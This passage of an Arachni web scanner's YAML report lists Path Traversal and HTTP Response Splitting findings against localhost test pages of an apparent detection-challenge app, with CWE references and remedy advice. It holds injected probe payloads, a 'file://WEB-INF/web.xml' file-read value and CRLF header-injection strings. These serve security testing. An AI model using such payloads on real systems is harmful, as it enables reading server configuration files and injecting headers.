MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." 
remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal var: input url: http://localhost:5784/tomcat/link/straight?input=default.html elem: link method: GET name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal opts: :redundant: false :async: true :regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n \ \n index.html\n index.htm\n \ index.jsp\n default.html\n \ default.htm\n default.jsp\n \ \n\n \n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default.html response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary 
|- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal var: cookie url: http://localhost:5784/tomcat/cookie/straight elem: cookie method: GET name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." 
remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal opts: :redundant: false :async: true :regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n \ \n index.html\n index.htm\n \ index.jsp\n default.html\n \ default.htm\n default.jsp\n \ \n\n \n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=file://WEB-INF/web.xml response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." 
remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal var: User-Agent url: http://localhost:5784/tomcat/header/straight elem: header method: GET name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Path_Traversal WASC: http://projects.webappsec.org/Path-Traversal opts: :redundant: false :async: true :regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n \ \n index.html\n index.htm\n \ index.jsp\n default.html\n \ default.htm\n default.jsp\n \ \n\n \n \n \n Weak authentication - basic\n /passive/session/weak-authentication-basic.jsp\n \ \n \n tomcat\n \ role1\n \n \n\n \ \n \n \ BASIC\n Application\n \ \n \n\n \ \n \n \ \n The role that is required to access protected pages\n \ \n tomcat\n \n\n \ \n \n The role that is required to access protected pages\n \n role1\n \n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: !binary |- ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu Cookie: cookie=default.html response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary 
"Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc4Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Path Traversal description: ! "The web application enforces improper limitation\n of a pathname to a restricted directory." tags: - path - traversal - injection - regexp cwe: '22' cwe_url: http://cwe.mitre.org/data/definitions/22.html severity: Medium cvssv2: '4.3' remedy_guidance: ! "User inputs must be validated and filtered\n before being used as a part of a filesystem path." remedy_code: '' metasploitable: unix/webapp/arachni_path_traversal mod_name: Path Traversal variations: [] internal_modname: PathTraversal internal_modname: PathTraversal - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: input url: http://localhost:10519/form/straight elem: form method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :param_flip: true :follow_location: false :injected_orig: ! 
"\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw== :combo: !binary "aW5wdXQ=": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/form/straight :regexp: '' var: input url: http://localhost:10519/form/straight injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no' id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1MyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: input url: http://localhost:10519/form/append elem: form method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :param_flip: true :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- ZGVmYXVsdCUwRCUwQVgtQ1JMRi1TYWZlLTk1ZjlmOGYwOGY2ZjM3OTI0MmQ3 YWRhODZjYWUxOTY4NWNhMzhlNWYzZTQyMjhkN2JjZDI0NTc1OGQ1YjljNTk6 JTIwbm8= :combo: !binary "aW5wdXQ=": ! 
"default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/form/append :regexp: '' var: input url: http://localhost:10519/form/append injected: default%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1MyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." 
remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: input url: http://localhost:10519/link/straight?input=default elem: link method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :param_flip: true :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": !binary |- DQpYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2Y2FlMTk2 ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OiBubwA= :injected: !binary |- JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubyUw MA== :combo: !binary "aW5wdXQ=": !binary |- DQpYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2Y2FlMTk2 ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OiBubwA= :action: http://localhost:10519/link/straight?input=default :regexp: '' var: input url: http://localhost:10519/link/straight?input=default injected: ! 
'%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no%00' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: input url: http://localhost:10519/link/append?input=default elem: link method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." 
tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :param_flip: true :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- ZGVmYXVsdCUwRCUwQVgtQ1JMRi1TYWZlLTk1ZjlmOGYwOGY2ZjM3OTI0MmQ3 YWRhODZjYWUxOTY4NWNhMzhlNWYzZTQyMjhkN2JjZDI0NTc1OGQ1YjljNTk6 JTIwbm8= :combo: !binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/link/append?input=default :regexp: '' var: input url: http://localhost:10519/link/append?input=default injected: default%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? 
!binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: cookie2 url: http://localhost:10519/cookie/append elem: cookie method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: ! 
"\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :cookies: !binary "Y29va2llMg==": ! "cookie value\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- Y29va2llJTIwdmFsdWUlMEQlMEFYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYz NzkyNDJkN2FkYTg2Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThk NWI5YzU5OiUyMG5v :combo: !binary "Y29va2llMg==": ! "cookie value\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/cookie/append :regexp: '' var: cookie2 url: http://localhost:10519/cookie/append injected: cookie%20value%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:+no;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- bm8= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." 
tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: [] internal_modname: ResponseSplitting internal_modname: ResponseSplitting - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting var: cookie url: http://localhost:10519/cookie/straight elem: cookie method: GET name: Response Splitting description: ! "The web application includes user input\n in the response HTTP header." tags: - response - splitting - injection - header cwe: '20' cwe_url: http://cwe.mitre.org/data/definitions/20.html severity: Medium cvssv2: '5.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included as part of the HTTP response headers." remedy_code: '' mod_name: Response Splitting variations: - !ruby/object:Arachni::Issue verification: false references: SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :altered: !binary |- Y29va2ll :element: cookie :params: {} :cookies: !binary "Y29va2ll": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :injected: !binary |- JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw== :combo: !binary "Y29va2ll": ! 
"\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59: no" :action: http://localhost:10519/cookie/straight :regexp: '' var: cookie url: http://localhost:10519/cookie/straight injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:+no response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= ? !binary |- WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1 Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ== : !binary |- 